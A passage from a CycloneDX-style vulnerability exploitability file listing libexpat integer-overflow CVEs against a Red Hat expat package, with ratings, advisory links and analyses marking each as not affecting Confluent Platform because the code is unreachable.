        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-56403",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in storeAtts.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56403"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56403"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1232"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56403"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56403"
        }
      ],
      "published": "2026-06-21T16:16:26+00:00",
      "updated": "2026-06-23T20:15:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56404",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in addBinding.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56404"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56404"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1249"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56404"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56404"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T20:15:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56405",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in getAttributeId.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56405"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56405"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1251"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56405"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56405"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T20:14:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56406",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in XML_ParseBuffer because it lacked a check that was present in XML_Parse.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56406"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56406"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1255"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56406"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56406"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T16:29:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56407",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in doProlog that is related to storeEntityValue and entity textLen.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56407"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56407"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1262"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56407"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56407"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T16:28:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56412",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
